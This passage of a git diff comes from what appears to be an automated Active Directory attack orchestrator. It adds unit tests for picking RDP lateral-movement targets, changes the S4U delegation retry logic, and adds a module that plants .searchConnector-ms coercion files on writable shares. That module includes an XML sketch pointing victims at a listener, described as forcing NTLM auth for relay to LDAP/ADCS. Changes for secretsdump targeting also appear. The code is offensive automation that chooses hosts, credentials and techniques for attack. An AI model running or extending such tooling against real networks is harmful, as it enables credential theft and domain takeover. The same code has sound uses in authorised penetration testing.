+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["445/tcp microsoft-ds".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_owned_host_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ true, // already owned
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_processed_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret
+ s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_non_admin_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ // Only a non-admin credential available
+ s.credentials.push(make_credential(
+ "user1",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ false,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "user1");
+ assert!(!work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_admin_over_non_admin() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "user1",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "Adm1nP@ss!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[tokio::test]
+ async fn collect_no_cred_for_domain_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ // Credential for wrong domain
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_bare_hostname_matches_any_domain_cred() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ // Bare hostname (no domain suffix) → domain = "" → matches any cred
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_hosts() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.11",
+ "srv02.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.12",
+ "web01.contoso.local",
+ vec!["80/tcp http".into()], // no RDP
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(ips.contains(&"192.168.58.11"));
+ }
+
+ #[tokio::test]
+ async fn collect_cred_with_empty_password_skipped() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "", "contoso.local", true));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_rdp_detection_by_name() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["remote desktop rdp".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_key_format() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work[0].dedup_key, "rdp:192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_cross_domain_hosts() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut s = shared.write().await;
+ s.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.fabrikam.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ s.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ s.credentials.push(make_credential(
+ "fadmin",
+ "F@bPass1!", // pragma: allowlist secret
+ "fabrikam.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 2);
+ // contoso host uses contoso cred
+ let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap();
+ assert_eq!(contoso_work.credential.domain, "contoso.local");
+ // fabrikam host uses fabrikam cred
+ let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap();
+ assert_eq!(fab_work.credential.domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_rdp_work_via_shared_state() {
+ let shared = crate::orchestrator::state::SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "srv01.contoso.local",
+ vec!["3389/tcp ms-wbt-server".into()],
+ false,
+ ));
+ state.credentials.push(make_credential(
+ "admin",
+ "P@ssw0rd!", // pragma: allowlist secret
+ "contoso.local",
+ true,
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_rdp_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("rdp:{}", "192.168.58.22");
+ assert_eq!(key, "rdp:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral");
+ }
+
+ #[test]
+ fn rdp_service_detection() {
+ let services = [
+ "3389/tcp ms-wbt-server".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn no_rdp_service() {
+ let services = [
+ "445/tcp microsoft-ds".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(!has_rdp);
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "srv01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn rdp_service_detection_by_name() {
+ let services = ["remote desktop rdp".to_string()];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn rdp_service_detection_case_insensitive() {
+ let services = ["3389/TCP MS-WBT-SERVER".to_string()];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(has_rdp);
+ }
+
+ #[test]
+ fn rdp_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "rdp_lateral",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "rdp_lateral");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn rdp_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = RdpWork {
+ dedup_key: "rdp:192.168.58.22".into(),
+ host_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+ assert_eq!(work.host_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert!(work.credential.is_admin);
+ }
+
+ #[test]
+ fn admin_credential_preferred() {
+ // The module first looks for admin creds, then falls back to any with password
+ let is_admin = true;
+ let has_password = true;
+ let admin_match = is_admin && has_password;
+ assert!(admin_match);
+ }
+
+ #[test]
+ fn empty_services_no_rdp() {
+ let services: Vec<String> = vec![];
+ let has_rdp = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("3389") || sl.contains("rdp")
+ });
+ assert!(!has_rdp);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs
index 008d5e17..4d34453c 100644
--- a/ares-cli/src/orchestrator/automation/s4u.rs
+++ b/ares-cli/src/orchestrator/automation/s4u.rs
@@ -99,15 +99,23 @@ pub async fn auto_s4u_exploitation(
// Don't increment failure count beyond what dispatch already counted.
// The cooldown timer is already set from dispatch time.
}
- } else {
- // Success or non-revocation error — reset failure count so
- // subsequent dispatches aren't permanently blocked by the
- // S4U_MAX_FAILURES threshold.
+ } else if should_reset_failure_count(result) {
+ // Only reset the failure count on actual success.
+ // Generic failures (wrong SPN, delegation edge is
+ // stale, service rejects S4U, etc.) must keep their
+ // accumulated count so deterministic dead-ends
+ // eventually stop retrying.
if let Some(vid) = task_vuln_map.remove(&tid) {
if let Some(entry) = dispatch_tracker.get_mut(&vid) {
entry.1 = 0;
}
}
+ } else {
+ // Non-lockout, non-success failure: preserve the
+ // existing failure count that was incremented on
+ // dispatch. Remove the task mapping so future result
+ // scans do not reprocess it.
+ task_vuln_map.remove(&tid);
}
}
}
@@ -362,6 +370,11 @@ fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool {
result_matches_patterns(result, LOCKOUT_PATTERNS)
}
+/// Only a successful S4U task should clear the accumulated failure count.
+fn should_reset_failure_count(result: &ares_core::models::TaskResult) -> bool {
+ result.success
+}
+
#[cfg(test)]
mod tests {
use super::*;
@@ -562,4 +575,28 @@ mod tests {
);
assert!(!has_lockout_error(&tr));
}
+
+ #[test]
+ fn successful_task_resets_failure_count() {
+ let tr = TaskResult {
+ task_id: "t-ok".to_string(),
+ success: true,
+ result: Some(json!({"summary": "ticket obtained"})),
+ error: None,
+ completed_at: Utc::now(),
+ };
+ assert!(should_reset_failure_count(&tr));
+ }
+
+ #[test]
+ fn generic_failure_does_not_reset_failure_count() {
+ let tr = TaskResult {
+ task_id: "t-fail".to_string(),
+ success: false,
+ result: Some(json!({"summary": "S4U failed: KRB_AP_ERR_MODIFIED"})),
+ error: None,
+ completed_at: Utc::now(),
+ };
+ assert!(!should_reset_failure_count(&tr));
+ }
}
diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs
new file mode 100644
index 00000000..53c7ce0a
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs
@@ -0,0 +1,502 @@
+//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares.
+//!
+//! .searchConnector-ms XML files trigger WebDAV connections when a user browses
+//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion),
+//! searchConnector files force HTTP-based NTLM auth, which bypasses SMB signing
+//! requirements and enables relay to LDAP/ADCS even when SMB signing is enforced.
+//!
+//! This module targets writable shares that auto_share_coercion has already
+//! identified, deploying a complementary coercion technique.
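+//!
+//! Minimal sketch of the dropped file's key element (shape follows public
+//! coercion research; the worker renders the real XML, and the UNC path
+//! below is illustrative only):
+//!
+//! ```xml
+//! <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
+//!   <simpleLocation>
+//!     <url>\\192.168.58.50\coerce</url>
+//!   </simpleLocation>
+//! </searchConnectorDescription>
+//! ```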
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SearchConnector coercion work items from current state.
+///
+/// Pure logic extracted from `auto_searchconnector_coercion` so it can be
+/// unit-tested without needing a `Dispatcher` or async runtime.
+fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec<SearchConnectorWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for share in &state.shares {
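+ // Only shares whose permission string mentions WRITE are targeted;
+ // note that a bare "FULL" permission string will not match (see the
+ // writable_share_full_permission test below).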
+ if !share.permissions.to_uppercase().contains("WRITE") {
+ continue;
+ }
+
+ let dedup_key = format!("searchconn:{}:{}", share.host, share.name);
+ if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) {
+ continue;
+ }
+
+ // Find credential for the share's host
+ let host_info = state.hosts.iter().find(|h| h.ip == share.host);
+ let domain = host_info
+ .and_then(|h| {
+ h.hostname
+ .find('.')
+ .map(|i| h.hostname[i + 1..].to_lowercase())
+ })
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(SearchConnectorWork {
+ dedup_key,
+ share_host: share.host.clone(),
+ share_name: share.name.clone(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Drops .searchConnector-ms coercion files on writable shares.
+/// Interval: 45s.
+pub async fn auto_searchconnector_coercion(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("searchconnector_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec<SearchConnectorWork> = {
+ let state = dispatcher.state.read().await;
+ collect_searchconnector_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "searchconnector_coercion",
+ "target_ip": item.share_host,
+ "share_name": item.share_name,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("searchconnector_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.share_host,
+ share = %item.share_name,
+ "searchConnector-ms coercion file dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.share_host, "searchConnector coercion deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion");
+ }
+ }
+ }
+ }
+}
+
+struct SearchConnectorWork {
+ dedup_key: String,
+ share_host: String,
+ share_name: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_share(host: &str, name: &str, permissions: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: permissions.into(),
+ comment: String::new(),
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("searchconn:{}:{}", "192.168.58.22", "Public");
+ assert_eq!(key, "searchconn:192.168.58.22:Public");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector");
+ }
+
+ #[test]
+ fn writable_share_detection() {
+ let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"];
+ for p in &write_perms {
+ assert!(
+ p.to_uppercase().contains("WRITE"),
+ "{p} should be detected as writable"
+ );
+ }
+ }
+
+ #[test]
+ fn readonly_share_rejected() {
+ let perm = "READ";
+ assert!(!perm.to_uppercase().contains("WRITE"));
+ }
+
+ #[test]
+ fn domain_from_host_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "searchconnector_coercion",
+ "target_ip": "192.168.58.22",
+ "share_name": "Public",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "searchconnector_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["share_name"], "Public");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn writable_share_full_permission() {
+ let perm = "FULL";
+ // FULL does not contain WRITE, so it should NOT be detected
+ assert!(!perm.to_uppercase().contains("WRITE"));
+ }
+
+ #[test]
+ fn domain_from_fqdn_with_subdomain() {
+ let hostname = "web01.sub.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "sub.contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn dedup_key_special_characters_in_share_name() {
+ let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces");
+ assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces");
+
+ let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$");
+ assert_eq!(key2, "searchconn:192.168.58.10:data$");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "svc_admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = SearchConnectorWork {
+ dedup_key: "searchconn:192.168.58.22:Public".into(),
+ share_host: "192.168.58.22".into(),
+ share_name: "Public".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public");
+ assert_eq!(work.share_host, "192.168.58.22");
+ assert_eq!(work.share_name, "Public");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "svc_admin");
+ assert_eq!(work.credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn case_insensitive_permission_matching() {
+ let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"];
+ for p in &perms {
+ assert!(
+ p.to_uppercase().contains("WRITE"),
+ "{p} should be detected as writable regardless of case"
+ );
+ }
+ }
+
+ // --- collect_searchconnector_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_shares_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_writable_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_host, "192.168.58.22");
+ assert_eq!(work[0].share_name, "Public");
+ assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn collect_readonly_share_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "READ"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ state.mark_processed(
+ DEDUP_SEARCHCONNECTOR,
+ "searchconn:192.168.58.22:Public".into(),
+ );
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_domain_matched_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential_no_host() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ // No host entry for this share IP, so domain is empty -> falls back to first cred
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_shares_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect();
+ assert!(names.contains(&"Public"));
+ assert!(names.contains(&"Data"));
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ }
+ let state = shared.read().await;
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_host, "192.168.58.22");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs
index 005da2b5..27d84f9c 100644
--- a/ares-cli/src/orchestrator/automation/secretsdump.rs
+++ b/ares-cli/src/orchestrator/automation/secretsdump.rs
@@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump(
let mut items = Vec::new();
for cred in &creds {
- for (dc_domain, dc_ip) in state.domain_controllers.iter() {
+ for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() {
if is_valid_secretsdump_target(dc_domain, &cred.domain) {
let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username);
if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) {
@@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump(
for dominated in &state.dominated_domains {
let dom = dominated.to_lowercase();
// Find parent domain DCs: domains where the child ends with ".{parent}"
- for (dc_domain, dc_ip) in state.domain_controllers.iter() {
+ for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() {
